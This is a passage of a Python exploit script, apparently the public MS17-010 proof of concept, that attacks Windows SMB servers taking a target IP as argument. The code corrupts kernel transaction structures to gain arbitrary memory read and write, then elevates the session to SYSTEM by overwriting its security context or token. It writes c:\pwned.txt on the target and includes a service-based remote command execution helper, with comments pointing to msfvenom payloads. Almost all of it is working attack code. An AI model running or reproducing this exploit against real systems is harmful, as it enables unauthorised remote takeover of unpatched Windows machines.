668 |     # On 32 bit target, we can write to any address if parameter count is 0xffffffff.
669 |     # On 64 bit target, modifying paramter count is not enough because address size is 64 bit. Because our transactions
670 |     #   are allocated with RtlAllocateHeap(), the HIDWORD of InParameter is always 0. To be able to write backward with offset only,
671 |     #   we also modify HIDWORD of InParameter to 0xffffffff.
672 |      
673 |     print('modify parameter count to 0xffffffff to be able to write backward')
674 |     conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
675 |     # on 64 bit, modify InParameter last 4 bytes to \xff\xff\xff\xff too
676 |     if info['arch'] == 'x64':
677 |         conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
678 |     wait_for_request_processed(conn)
679 |      
680 |     TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 0x1000 + HEAP_CHUNK_PAD_SIZE
681 |     PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN
682 |     PREV_TRANS_OFFSET = 0x100000000 - PREV_TRANS_DISPLACEMENT
683 |  
684 |     # modify paramterCount of first transaction
685 |     conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
686 |     if info['arch'] == 'x64':
687 |         conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
688 |         # restore trans2.InParameters pointer before leaking next transaction
689 |         conn.send_trans_secondary(mid=info['fid'], data='\x00'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
690 |     wait_for_request_processed(conn)
691 |  
692 |     # ================================
693 |     # leak transaction
694 |     # ================================
695 |     print('leak next transaction')
696 |     # modify TRANSACTION member to leak info
697 |     # function=5 (NT_TRANS_RENAME)
698 |     conn.send_trans_secondary(mid=info['fid'], data='\x05', dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_FUNCTION_OFFSET'])
699 |     # parameterCount, totalParameterCount, maxParameterCount, dataCount, totalDataCount
700 |     conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 0x100, 0x100), dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_PARAMCNT_OFFSET'])
701 |  
702 |     conn.send_nt_trans_secondary(mid=special_mid)
703 |     leakData = conn.recv_transaction_data(special_mid, 0x100)
704 |     leakData = leakData[4:]  # remove param
705 |     #open('leak.dat', 'wb').write(leakData)
706 |  
707 |     # check heap chunk size value in leak data
708 |     if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != (TRANS_CHUNK_SIZE // info['POOL_ALIGN']):
709 |         print('chunk size is wrong')
710 |         return False
711 |  
712 |     # extract leak transaction data and make next transaction to be trans2
713 |     leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
714 |     leakTrans = leakData[leakTranOffset:]
715 |     fmt = info['PTR_FMT']
716 |     _, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+fmt*5, leakTrans, 8)
717 |     inparam_value, outparam_value, indata_value = unpack_from('<'+fmt*3, leakTrans, info['TRANS_INPARAM_OFFSET'])
718 |     trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
719 |      
720 |     print('CONNECTION: 0x{:x}'.format(connection_addr))
721 |     print('SESSION: 0x{:x}'.format(session_addr))
722 |     print('FLINK: 0x{:x}'.format(flink_value))
723 |     print('InData: 0x{:x}'.format(indata_value))
724 |     print('MID: 0x{:x}'.format(trans2_mid))
725 |      
726 |     trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN
727 |     trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2
728 |     print('TRANS1: 0x{:x}'.format(trans1_addr))
729 |     print('TRANS2: 0x{:x}'.format(trans2_addr))
730 |      
731 |     # ================================
732 |     # modify trans struct to be used for arbitrary read/write
733 |     # ================================
734 |     print('modify transaction struct for arbitrary read/write')
735 |     # modify
736 |     # - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
737 |     # - trans1.InData to &trans2. so we can modify trans2 with trans1 data
738 |     # Note: HIDWORD of trans1.InParameter is still 0xffffffff
739 |     TRANS_OFFSET = 0x100000000 - (info['TRANS_SIZE'] + TRANS_NAME_LEN)
740 |     conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<'+fmt*3, trans1_addr, trans1_addr+0x200, trans2_addr), paramDisplacement=TRANS_OFFSET+info['TRANS_INPARAM_OFFSET'])
741 |     wait_for_request_processed(conn)
742 |      
743 |     # modify trans1.mid
744 |     trans1_mid = conn.next_mid()
745 |     conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])
746 |     wait_for_request_processed(conn)
747 |      
748 |     info.update({
749 |         'connection': connection_addr,
750 |         'session': session_addr,
751 |         'trans1_mid': trans1_mid,
752 |         'trans1_addr': trans1_addr,
753 |         'trans2_mid': trans2_mid,
754 |         'trans2_addr': trans2_addr,
755 |     })
756 |     return True
757 |  
758 | def create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr):
759 |     SID_SYSTEM = pack('<BB5xB'+'I', 1, 1, 5, 18)
760 |     SID_ADMINISTRATORS = pack('<BB5xB'+'II', 1, 2, 5, 32, 544)
761 |     SID_AUTHENICATED_USERS = pack('<BB5xB'+'I', 1, 1, 5, 11)
762 |     SID_EVERYONE = pack('<BB5xB'+'I', 1, 1, 1, 0)
763 |     # SID_SYSTEM and SID_ADMINISTRATORS must be added
764 |     sids = [ SID_SYSTEM, SID_ADMINISTRATORS, SID_EVERYONE, SID_AUTHENICATED_USERS ]
765 |     # - user has no attribute (0)
766 |     # - 0xe: SE_GROUP_OWNER | SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT
767 |     # - 0x7: SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_MANDATORY
768 |     attrs = [ 0, 0xe, 7, 7 ]
769 |      
770 |     # assume its space is enough for SID_SYSTEM and SID_ADMINISTRATORS (no check)
771 |     # fake user and groups will be in same buffer of original one
772 |     # so fake sids size must NOT be bigger than the original sids
773 |     fakeUserAndGroupCount = min(userAndGroupCount, 4)
774 |     fakeUserAndGroupsAddr = userAndGroupsAddr
775 |      
776 |     addr = fakeUserAndGroupsAddr + (fakeUserAndGroupCount * info['PTR_SIZE'] * 2)
777 |     fakeUserAndGroups = ''
778 |     for sid, attr in zip(sids[:fakeUserAndGroupCount], attrs[:fakeUserAndGroupCount]):
779 |         fakeUserAndGroups += pack('<'+info['PTR_FMT']*2, addr, attr)
780 |         addr += len(sid)
781 |     fakeUserAndGroups += ''.join(sids[:fakeUserAndGroupCount])
782 |      
783 |     return fakeUserAndGroupCount, fakeUserAndGroups
784 |  
785 |  
786 | def exploit(target, pipe_name):
787 |     conn = MYSMB(target)
788 |      
789 |     # set NODELAY to make exploit much faster
790 |     conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
791 |  
792 |     info = {}
793 |  
794 |     conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
795 |     server_os = conn.get_server_os()
796 |     print('Target OS: '+server_os)
797 |     if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
798 |         info['os'] = 'WIN7'
799 |         info['method'] = exploit_matched_pairs
800 |     elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 ") or server_os.startswith("Windows 10"):
801 |         info['os'] = 'WIN8'
802 |         info['method'] = exploit_matched_pairs
803 |     elif server_os.startswith("Windows Server (R) 2008") or server_os.startswith('Windows Vista'):
804 |         info['os'] = 'WIN7'
805 |         info['method'] = exploit_fish_barrel
806 |     elif server_os.startswith("Windows Server 2003 "):
807 |         info['os'] = 'WIN2K3'
808 |         info['method'] = exploit_fish_barrel
809 |     elif server_os.startswith("Windows 5.1"):
810 |         info['os'] = 'WINXP'
811 |         info['arch'] = 'x86'
812 |         info['method'] = exploit_fish_barrel
813 |     elif server_os.startswith("Windows XP "):
814 |         info['os'] = 'WINXP'
815 |         info['arch'] = 'x64'
816 |         info['method'] = exploit_fish_barrel
817 |     elif server_os.startswith("Windows 5.0"):
818 |         info['os'] = 'WIN2K'
819 |         info['arch'] = 'x86'
820 |         info['method'] = exploit_fish_barrel
821 |     else:
822 |         print('This exploit does not support this target')
823 |         sys.exit()
824 |      
825 |     if pipe_name is None:
826 |         pipe_name = find_named_pipe(conn)
827 |         if pipe_name is None:
828 |             print('Not found accessible named pipe')
829 |             return False
830 |         print('Using named pipe: '+pipe_name)
831 |  
832 |     if not info['method'](conn, pipe_name, info):
833 |         return False
834 |  
835 |     # Now, read_data() and write_data() can be used for arbitrary read and write.
836 |     # ================================
837 |     # Modify this SMB session to be SYSTEM
838 |     # ================================  
839 |     fmt = info['PTR_FMT']
840 |      
841 |     print('make this SMB session to be SYSTEM')
842 |     # IsNullSession = 0, IsAdmin = 1
843 |     write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01')
844 |  
845 |     # read session struct to get SecurityContext address
846 |     sessionData = read_data(conn, info, info['session'], 0x100)
847 |     secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
848 |  
849 |     if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
850 |         # Windows 2003 and earlier uses only ImpersonateSecurityContext() (with PCtxtHandle struct) for impersonation
851 |         # Modifying token seems to be difficult. But writing kernel shellcode for all old Windows versions is
852 |         # much more difficult because data offset in ETHREAD/EPROCESS is different between service pack.
853 |          
854 |         # find the token and modify it
855 |         if 'SECCTX_PCTXTHANDLE_OFFSET' in info:
856 |             pctxtDataInfo = read_data(conn, info, secCtxAddr+info['SECCTX_PCTXTHANDLE_OFFSET'], 8)
857 |             pctxtDataAddr = unpack_from('<'+fmt, pctxtDataInfo)[0]
858 |         else:
859 |             pctxtDataAddr = secCtxAddr
860 |  
861 |         tokenAddrInfo = read_data(conn, info, pctxtDataAddr+info['PCTXTHANDLE_TOKEN_OFFSET'], 8)
862 |         tokenAddr = unpack_from('<'+fmt, tokenAddrInfo)[0]
863 |         print('current TOKEN addr: 0x{:x}'.format(tokenAddr))
864 |          
865 |         # copy Token data for restoration
866 |         tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
867 |          
868 |         userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
869 |         userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
870 |         print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
871 |         print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
872 |  
873 |         print('overwriting token UserAndGroups')
874 |         # modify UserAndGroups info
875 |         fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
876 |         if fakeUserAndGroupCount != userAndGroupCount:
877 |             write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', fakeUserAndGroupCount))
878 |         write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
879 |     else:
880 |         # the target can use PsImperonateClient for impersonation (Windows 2008 and later)
881 |         # copy SecurityContext for restoration
882 |         secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
883 |  
884 |         print('overwriting session security context')
885 |         # see FAKE_SECCTX detail at top of the file
886 |         write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
887 |  
888 |     # ================================
889 |     # do whatever we want as SYSTEM over this SMB connection
890 |     # ================================  
891 |     try:
892 |         smb_pwn(conn, info['arch'])
893 |     except:
894 |         pass
895 |  
896 |     # restore SecurityContext/Token
897 |     if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
898 |         userAndGroupsOffset = userAndGroupsAddr - tokenAddr
899 |         write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
900 |         if fakeUserAndGroupCount != userAndGroupCount:
901 |             write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', userAndGroupCount))
902 |     else:
903 |         write_data(conn, info, secCtxAddr, secCtxData)
904 |  
905 |     conn.disconnect_tree(conn.get_tid())
906 |     conn.logoff()
907 |     conn.get_socket().close()
908 |     return True
909 |  
910 |  
911 | def smb_pwn(conn, arch):
912 |     smbConn = conn.get_smbconnection()
913 |      
914 |     print('creating file c:\\pwned.txt on the target')
915 |     tid2 = smbConn.connectTree('C$')
916 |     fid2 = smbConn.createFile(tid2, '/pwned.txt')
917 |     smbConn.closeFile(tid2, fid2)
918 |     smbConn.disconnectTree(tid2)
919 |      
920 |     #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
921 |     #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
922 |     # Note: there are many methods to get shell over SMB admin session
923 |     # a simple method to get shell (but easily to be detected by AV) is
924 |     # executing binary generated by "msfvenom -f exe-service ..."
925 |  
926 | def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
927 |     with open(localSrc, 'rb') as fp:
928 |         smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
929 |  
930 | # based on impacket/examples/serviceinstall.py
931 | # Note: using Windows Service to execute command same as how psexec works
932 | def service_exec(conn, cmd):
933 |     import random
934 |     import string
935 |     from impacket.dcerpc.v5 import transport, srvs, scmr
936 |      
937 |     service_name = ''.join([random.choice(string.letters) for i in range(4)])
938 |  
939 |     # Setup up a DCE SMBTransport with the connection already in place
940 |     rpcsvc = conn.get_dce_rpc('svcctl')
941 |     rpcsvc.connect()
942 |     rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
943 |     svcHandle = None
944 |     try:
945 |         print("Opening SVCManager on %s....." % conn.get_remote_host())
946 |         resp = scmr.hROpenSCManagerW(rpcsvc)
947 |         svcHandle = resp['lpScHandle']
948 |          
949 |         # First we try to open the service in case it exists. If it does, we remove it.
950 |         try:
951 |             resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00')
952 |         except Exception as e:
953 |             if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:
954 |                 raise e  # Unexpected error
955 |         else:
956 |             # It exists, remove it
957 |             scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])
958 |             scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])
959 |          
960 |         print('Creating service %s.....' % service_name)
961 |         resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00')
962 |         serviceHandle = resp['lpServiceHandle']
963 |          
964 |         if serviceHandle:
965 |             # Start service
966 |             try:
967 |                 print('Starting service %s.....' % service_name)
968 |                 scmr.hRStartServiceW(rpcsvc, serviceHandle)
969 |                 # is it really need to stop?
970 |                 # using command line always makes starting service fail because SetServiceStatus() does not get called
971 |                 #print('Stoping service %s.....' % service_name)
972 |                 #scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
973 |             except Exception as e:
974 |                 print(str(e))
975 |              
976 |             print('Removing service %s.....' % service_name)
977 |             scmr.hRDeleteService(rpcsvc, serviceHandle)
978 |             scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
979 |     except Exception as e:
980 |         print("ServiceExec Error on: %s" % conn.get_remote_host())
981 |         print(str(e))
982 |     finally:
983 |         if svcHandle:
984 |             scmr.hRCloseServiceHandle(rpcsvc, svcHandle)
985 |  
986 |     rpcsvc.disconnect()
987 |  
988 |  
989 | if len(sys.argv) < 2:
990 |     print("{} <ip> [pipe_name]".format(sys.argv[0]))
991 |     sys.exit(1)
992 |  
993 | target = sys.argv[1]
994 | pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
995 |  
996 | exploit(target, pipe_name)
997 | print('Done')
998 | 
999 | 


--------------------------------------------------------------------------------